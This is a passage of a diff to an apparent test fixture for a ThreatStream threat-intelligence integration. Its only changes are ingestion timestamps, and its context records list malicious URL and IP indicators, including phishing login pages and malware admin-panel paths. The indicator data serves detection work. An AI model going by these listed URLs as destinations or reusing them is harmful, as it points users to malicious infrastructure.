"2021-12-14T14:57:43.118265456Z", "original": "{\"created\":\"2020-02-01T02:04:21.705Z\",\"description\":\"TS ID: 55277443078; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--d1161e31-f661-469c-b206-84e1d416e577\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-73\"],\"modified\":\"2020-02-01T02:04:21.705Z\",\"name\":\"mal_url: http://gosdick.beget.tech/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gosdick.beget.tech/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:04:21.705Z\"}", "category": "threat", "type": "indicator", @@ -12246,7 +12246,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023956800Z", + "ingested": "2021-12-14T14:57:43.118265941Z", "original": "{\"created\":\"2020-02-01T02:04:21.745Z\",\"description\":\"TS ID: 55277442685; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime\",\"id\":\"indicator--8f0a9931-5ee4-4b0e-b473-b130d72ef175\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-17\"],\"modified\":\"2020-02-01T02:04:21.745Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:04:21.745Z\"}", "category": "threat", "type": "indicator", @@ -12298,7 +12298,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023963Z", + "ingested": "2021-12-14T14:57:43.118266377Z", "original": "{\"created\":\"2020-02-01T02:05:07.232Z\",\"description\":\"TS ID: 55277443523; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--0068cb9c-0bdf-44a8-9563-5006e0c38921\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-02-01T02:05:07.232Z\",\"name\":\"mal_url: http://everest--sh.com/click/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://everest--sh.com/click/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:05:07.232Z\"}", "category": "threat", "type": "indicator", @@ -12350,7 +12350,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023969300Z", + "ingested": "2021-12-14T14:57:43.118266835Z", "original": "{\"created\":\"2020-02-01T02:05:07.274Z\",\"description\":\"TS ID: 55277442283; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--2dd49cbe-4835-49ea-a29c-b173c0840506\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-01T02:05:07.274Z\",\"name\":\"mal_url: http://89.160.20.156/tspir/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/tspir/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:05:07.274Z\"}", "category": "threat", "type": "indicator", @@ -12402,7 +12402,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023975100Z", + "ingested": "2021-12-14T14:57:43.118267248Z", "original": "{\"created\":\"2020-02-01T02:06:07.042Z\",\"description\":\"TS ID: 55277443220; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--b8e709b0-7eb8-4b2b-94f0-e21c4138cf9b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-01T02:06:07.042Z\",\"name\":\"mal_url: http://vware.duckdns.org/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://vware.duckdns.org/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:06:07.042Z\"}", "category": "threat", "type": "indicator", @@ -12454,7 +12454,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023981700Z", + "ingested": "2021-12-14T14:57:43.118267765Z", "original": "{\"created\":\"2020-02-01T02:06:15.505Z\",\"description\":\"TS ID: 55277443605; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--10e62d11-dbc5-4d39-badf-574aaab2d0f5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-02-01T02:06:15.505Z\",\"name\":\"mal_url: http://cokhiquangbien.com/.jx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://cokhiquangbien.com/.jx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:06:15.505Z\"}", "category": "threat", "type": "indicator", @@ -12506,7 +12506,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023989100Z", + "ingested": "2021-12-14T14:57:43.118268211Z", "original": "{\"created\":\"2020-02-01T02:06:15.674Z\",\"description\":\"TS ID: 55277443276; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--a84ddb39-c02c-44cc-bac3-0056c279454c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-01T02:06:15.674Z\",\"name\":\"mal_url: http://corpcougar.com/nedu/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://corpcougar.com/nedu/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:06:15.674Z\"}", "category": "threat", "type": "indicator", @@ -12557,7 +12557,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023996300Z", + "ingested": "2021-12-14T14:57:43.118268641Z", "original": "{\"created\":\"2020-02-01T02:06:38.684Z\",\"description\":\"TS ID: 55277443190; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--f667d2dd-f6df-4aa4-bd7b-8b7f3e98fa0a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-01T02:06:38.684Z\",\"name\":\"mal_url: http://bubble2.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://bubble2.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:06:38.684Z\"}", "category": "threat", "type": "indicator", @@ -12609,7 +12609,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024003700Z", + "ingested": "2021-12-14T14:57:43.118269027Z", "original": "{\"created\":\"2020-02-01T02:06:38.733Z\",\"description\":\"TS ID: 55277442690; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--a81a2408-b11b-4b28-a5b6-ffec11942d62\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-32\"],\"modified\":\"2020-02-01T02:06:38.733Z\",\"name\":\"mal_url: http://144.202.96.212/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://144.202.96.212/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:06:38.733Z\"}", "category": "threat", "type": "indicator", @@ -12661,7 +12661,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024011Z", + "ingested": "2021-12-14T14:57:43.118269412Z", "original": "{\"created\":\"2020-02-01T02:06:49.292Z\",\"description\":\"TS ID: 55277443216; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--4a414cbe-3e02-48b9-84fb-103ed9961e6c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-02-01T02:06:49.292Z\",\"name\":\"mal_url: http://papafrog.beget.tech/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://papafrog.beget.tech/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:06:49.292Z\"}", "category": "threat", "type": "indicator", @@ -12712,7 +12712,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024018300Z", + "ingested": "2021-12-14T14:57:43.118269906Z", "original": "{\"created\":\"2020-02-01T02:07:27.633Z\",\"description\":\"TS ID: 55277443028; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--27f66dbf-4ce9-4616-aef1-c6ab9f224ecb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-01T02:07:27.633Z\",\"name\":\"mal_url: http://t917659s.beget.tech/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://t917659s.beget.tech/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:07:27.633Z\"}", "category": "threat", "type": "indicator", @@ -12763,7 +12763,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024025500Z", + "ingested": "2021-12-14T14:57:43.118270289Z", "original": "{\"created\":\"2020-02-01T02:07:36.513Z\",\"description\":\"TS ID: 55277443145; iType: mal_url; State: active; Org: Host Europe GmbH; Source: CyberCrime\",\"id\":\"indicator--4cd504ee-3b5e-439f-b37d-3e932b200a55\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-01T02:07:36.513Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:07:36.513Z\"}", "category": "threat", "type": "indicator", @@ -12815,7 +12815,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024032700Z", + "ingested": "2021-12-14T14:57:43.118270710Z", "original": "{\"created\":\"2020-02-01T02:08:09.833Z\",\"description\":\"TS ID: 55277443560; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--7d803ca2-4e7d-414e-9693-854d08c49bb6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-01T02:08:09.833Z\",\"name\":\"mal_url: http://drop-box.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://drop-box.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:09.833Z\"}", "category": "threat", "type": "indicator", @@ -12867,7 +12867,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024040100Z", + "ingested": "2021-12-14T14:57:43.118271097Z", "original": "{\"created\":\"2020-02-01T02:08:09.939Z\",\"description\":\"TS ID: 55277442673; iType: mal_url; State: active; Org: Mir Telematiki Ltd; Source: CyberCrime\",\"id\":\"indicator--7cbc0a23-df38-4526-84b1-b344948f0b72\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-63\"],\"modified\":\"2020-02-01T02:08:09.939Z\",\"name\":\"mal_url: http://89.160.20.156/xcool!/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/xcool!/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:09.939Z\"}", "category": "threat", "type": "indicator", @@ -12912,7 +12912,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024047200Z", + "ingested": "2021-12-14T14:57:43.118271596Z", "original": "{\"created\":\"2020-02-01T02:08:31.777Z\",\"description\":\"TS ID: 55277443138; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--9530c9fb-99b6-40af-b14a-a622cff510b1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-01T02:08:31.777Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:31.777Z\"}", "category": "threat", "type": "indicator", @@ -12957,7 +12957,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024051300Z", + "ingested": "2021-12-14T14:57:43.118272024Z", "original": "{\"created\":\"2020-02-01T02:08:31.818Z\",\"description\":\"TS ID: 55277442273; iType: mal_ip; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--6955fd8f-b856-43aa-bac7-0d5a2d8519f2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:08:31.818Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:31.818Z\"}", "category": "threat", "type": "indicator", @@ -13009,7 +13009,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024056600Z", + "ingested": "2021-12-14T14:57:43.118272486Z", "original": "{\"created\":\"2020-02-01T02:08:42.76Z\",\"description\":\"TS ID: 55277443599; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--4c8f8d86-da50-48bb-a41b-8a002561315a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-01T02:08:42.76Z\",\"name\":\"mal_url: http://digi-sec.top/lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://digi-sec.top/lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:42.76Z\"}", "category": "threat", "type": "indicator", @@ -13061,7 +13061,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024061900Z", + "ingested": "2021-12-14T14:57:43.118272922Z", "original": "{\"created\":\"2020-02-01T02:09:05.295Z\",\"description\":\"TS ID: 55277443514; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--3639e6da-8159-4dd6-b928-b8189c29159f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-02-01T02:09:05.295Z\",\"name\":\"mal_url: http://everest--sh.com/cola/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://everest--sh.com/cola/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:09:05.295Z\"}", "category": "threat", "type": "indicator", @@ -13112,7 +13112,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024067600Z", + "ingested": "2021-12-14T14:57:43.118273409Z", "original": "{\"created\":\"2020-02-01T02:09:13.398Z\",\"description\":\"TS ID: 55277443134; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--7d4bf98b-8fc2-427c-a08b-f432e43c1110\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-01T02:09:13.398Z\",\"name\":\"mal_url: http://moonberry.pk/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://moonberry.pk/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:09:13.398Z\"}", "category": "threat", "type": "indicator", @@ -13164,7 +13164,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024071500Z", + "ingested": "2021-12-14T14:57:43.118273814Z", "original": "{\"created\":\"2020-02-01T02:09:49.804Z\",\"description\":\"TS ID: 55277442688; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--0f2bf75c-d534-48e9-a25f-940cc5f673ed\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-01T02:09:49.804Z\",\"name\":\"mal_url: http://207.246.67.4/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://207.246.67.4/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:09:49.804Z\"}", "category": "threat", "type": "indicator", @@ -13216,7 +13216,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024077200Z", + "ingested": "2021-12-14T14:57:43.118274270Z", "original": "{\"created\":\"2020-02-01T02:09:56.524Z\",\"description\":\"TS ID: 55277443239; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--0cdef192-7b00-48b1-b8d4-a9642e37d630\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-01T02:09:56.524Z\",\"name\":\"mal_url: http://farzanatradings.com/odogwu/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farzanatradings.com/odogwu/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:09:56.524Z\"}", "category": "threat", "type": "indicator", @@ -13268,7 +13268,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024081400Z", + "ingested": "2021-12-14T14:57:43.118274778Z", "original": "{\"created\":\"2020-02-01T02:10:00.889Z\",\"description\":\"TS ID: 55277443489; iType: mal_url; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--e409b749-d733-4b69-83cf-4df74ac8fd2b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-01T02:10:00.889Z\",\"name\":\"mal_url: http://gpi-q.com/clean/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gpi-q.com/clean/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:00.889Z\"}", "category": "threat", "type": "indicator", @@ -13320,7 +13320,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024085900Z", + "ingested": "2021-12-14T14:57:43.118275214Z", "original": "{\"created\":\"2020-02-01T02:10:04.196Z\",\"description\":\"TS ID: 55277443402; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime\",\"id\":\"indicator--347a1f39-78c4-4f71-b125-decaba2489b4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:10:04.196Z\",\"name\":\"mal_url: http://trouserlanditd.com/drug/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://trouserlanditd.com/drug/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:04.196Z\"}", "category": "threat", "type": "indicator", @@ -13372,7 +13372,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024089400Z", + "ingested": "2021-12-14T14:57:43.118275676Z", "original": "{\"created\":\"2020-02-01T02:10:04.234Z\",\"description\":\"TS ID: 55277443231; iType: mal_url; State: active; Org: Fornex Hosting S.L.; Source: CyberCrime\",\"id\":\"indicator--acd84a21-6112-4bbb-9132-fa50a9b7b07c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:10:04.234Z\",\"name\":\"mal_url: http://nextbridge.info/god/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nextbridge.info/god/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:04.234Z\"}", "category": "threat", "type": "indicator", @@ -13424,7 +13424,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024094700Z", + "ingested": "2021-12-14T14:57:43.118276114Z", "original": "{\"created\":\"2020-02-01T02:10:18.897Z\",\"description\":\"TS ID: 55277442692; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--d2990eea-f233-4296-b7ea-dc78ad48f1a3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-01T02:10:18.897Z\",\"name\":\"mal_url: http://89.160.20.156/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:18.897Z\"}", "category": "threat", "type": "indicator", @@ -13476,7 +13476,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024100500Z", + "ingested": "2021-12-14T14:57:43.118276687Z", "original": "{\"created\":\"2020-02-01T02:10:19.383Z\",\"description\":\"TS ID: 55277443285; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--ca6a96b9-60e6-429f-9223-7009c1a5e164\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-01T02:10:19.383Z\",\"name\":\"mal_url: http://corpcougar.com/collins/32/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://corpcougar.com/collins/32/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:19.383Z\"}", "category": "threat", "type": "indicator", @@ -13521,7 +13521,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024106700Z", + "ingested": "2021-12-14T14:57:43.118277142Z", "original": "{\"created\":\"2020-02-01T02:10:19.417Z\",\"description\":\"TS ID: 55277443195; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--1339e0b5-4398-4de4-9175-e685b6d0f5a4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-01T02:10:19.417Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:19.417Z\"}", "category": "threat", "type": "indicator", @@ -13573,7 +13573,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024114200Z", + "ingested": "2021-12-14T14:57:43.118277527Z", "original": "{\"created\":\"2020-02-01T02:10:39.062Z\",\"description\":\"TS ID: 55277443225; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--5a37e909-b130-4f49-b1d5-f4645a9d4c21\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-01T02:10:39.062Z\",\"name\":\"mal_url: http://pom4ekk.myjino.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pom4ekk.myjino.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:39.062Z\"}", "category": "threat", "type": "indicator", @@ -13624,7 +13624,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024121400Z", + "ingested": "2021-12-14T14:57:43.118277970Z", "original": "{\"created\":\"2020-02-01T02:10:42.316Z\",\"description\":\"TS ID: 55277443198; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--9c6caf78-5bcd-4f6f-bc0f-d094a027a811\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-02-01T02:10:42.316Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:42.316Z\"}", "category": "threat", "type": "indicator", @@ -13676,7 +13676,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024128600Z", + "ingested": "2021-12-14T14:57:43.118278435Z", "original": "{\"created\":\"2020-02-01T02:11:07.132Z\",\"description\":\"TS ID: 55277443508; iType: mal_url; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--d5f6e0de-d0bb-48f9-931d-5f4fd725a712\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-01T02:11:07.132Z\",\"name\":\"mal_url: http://gpi-q.com/clap/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gpi-q.com/clap/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:11:07.132Z\"}", "category": "threat", "type": "indicator", @@ -13728,7 +13728,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024135800Z", + "ingested": "2021-12-14T14:57:43.118278889Z", "original": "{\"created\":\"2020-02-01T02:11:07.159Z\",\"description\":\"TS ID: 55277443305; iType: mal_url; State: active; Org: LLC Baxet; Source: CyberCrime\",\"id\":\"indicator--d2ef46a3-6df2-4cc9-bb15-886dc24d41e5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-01T02:11:07.159Z\",\"name\":\"mal_url: http://betprognoz.pro/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://betprognoz.pro/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:11:07.159Z\"}", "category": "threat", "type": "indicator", @@ -13779,7 +13779,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024142800Z", + "ingested": "2021-12-14T14:57:43.118279316Z", "original": "{\"created\":\"2020-02-01T02:11:33.332Z\",\"description\":\"TS ID: 55277443141; iType: mal_url; State: active; Org: Host Sailor Ltd.; Source: CyberCrime\",\"id\":\"indicator--6c50f1f6-c27a-4484-ac53-728654ba2db3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-01T02:11:33.332Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:11:33.332Z\"}", "category": "threat", "type": "indicator", @@ -13831,7 +13831,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024150Z", + "ingested": "2021-12-14T14:57:43.118279760Z", "original": "{\"created\":\"2020-02-01T02:11:40.48Z\",\"description\":\"TS ID: 55277443247; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--ede31398-e157-401a-9362-127f5c5983ce\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-01T02:11:40.48Z\",\"name\":\"mal_url: http://farzanatradings.com/fakedon/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farzanatradings.com/fakedon/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:11:40.48Z\"}", "category": "threat", "type": "indicator", @@ -13882,7 +13882,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024157100Z", + 